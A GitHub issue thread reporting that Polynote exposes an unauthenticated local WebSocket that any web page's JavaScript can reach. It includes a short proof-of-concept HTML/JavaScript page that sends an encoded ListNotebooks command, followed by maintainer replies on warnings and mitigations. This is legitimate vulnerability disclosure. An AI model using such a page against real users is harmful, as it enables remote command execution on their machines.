### ISSUE TITLE
Running polynote on a computer exposes an un-authenticated WebSocket on ws://127.0.0.1:8192/ws which any application or javascript in web pages can access.

### ISSUE THREAD

**Issue by owainkenwayucl** [polynote/polynote#552]
By design polynote has an unauthenticated WebSocket at ws://127.0.0.1:8192/ws which can be accessed to run commands as the user the polynote server runs on not only by other users and applications on the machine, but also JavaScript on any page any user of that system browses to.

Example: Run ListNotebooks on user's machine:

```html
<html>
<script>
console.log("Loaded");
var socket = new WebSocket('ws://127.0.0.1:8192/ws');

socket.onopen = (event) => {
	var msg = new Uint8Array([13,0,0,0,0]);
	socket.send(msg);
}

socket.onmessage = (event) => {
	if (event.data instanceof Blob) {
		reader = new FileReader();
		reader.onload = () => console.log(reader.result);
		reader.readAsText(event.data);
	}
}
</script>
</html>
```

This JavaScript can be served up to the user's browser in any way (malicious page, malicious ad) and executes the command "ListNotebooks" on the websocket, printing the results to the javascript console.  Obvously, examining the source code of polynote there are many more dangerous commands that can be executed, including execution of arbitrary python etc.

As an example, here is a user accidentally navigating to a web page on another computer (192.168.13.37 on my virtual network) which runs the javascript above which connects to the PolyNote server on the user's VM.

![remotepn](https://user-images.githubusercontent.com/4256093/67608954-76a75e00-f782-11e9-9d5a-2df47e607690.png)

The only real difficulty exploiting this is working out the encoding scheme for commands by reading the code and knowing some javascript.

**Comment by jeremyrsmith** [comment]
Yes, this is absolutely true, and that's why there's a huge warning about it: https://polynote.org/docs/01-installation.html

Thanks for the great example, though! We'll leave this issue here as a reminder to people not to leave Polynote running on their browsing machine. It would be great to add some mechanism for securing the websocket connection; PRs are more than welcome!

**Comment by owainkenwayucl** [comment]
I think the warning needs to be more explicit on the risks - I don't think users would expect other web-sites they browse to be able to compromise polynote on their laptop from that warning.  

In terms of fixing it, I'm not a Scala/Typescript expert but I have some leave coming up so I might take a look.  One simple fix (that would fix this but not issues like other users of the machine being able to connect over the loopback interface with a browser) would be to randomise the websocket URL to a suitable degree each time the server is launched e.g. `/129ksasdsjrasjkcjaf0w940w4aokwafd902384` rather than `/ws` so it would be effectively impossible to guess.  I believe the Jupyter people use a Python library function to generate these so I imagine there is a similar thing for Java/Scala.

**Comment by jeremyrsmith** [comment]
> I think the warning needs to be more explicit on the risks - I don't think users would expect other web-sites they browse to be able to compromise polynote on their laptop from that warning.

This is a great point. We should make that warning a little more explicit about the risks.

Today we'll make a release including #573 (which hopefully mitigates this concern somewhat, though I don't want to give anyone the impression that anything we do can make Polynote safe to run) and #574 which hopefully serves as a scarier reminder about the potential risks.

We should also update the warning on the website to call out some specific (perhaps non-obvious) risks. And I think we'll continue to leave this issue open indefinitely, because I don't see it ever *not* being an issue.
